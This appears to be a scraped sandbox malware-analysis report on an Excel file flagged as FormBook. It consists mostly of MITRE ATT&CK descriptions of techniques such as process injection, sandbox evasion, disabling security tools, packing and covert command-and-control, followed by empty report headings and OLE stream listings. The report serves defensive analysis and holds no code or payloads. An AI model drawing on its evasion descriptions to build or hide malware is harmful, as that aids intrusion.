Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report NEW 01 13 2021.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "NEW 01 13 2021.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

Function 0041825C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38
filenativeCOMMON

Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON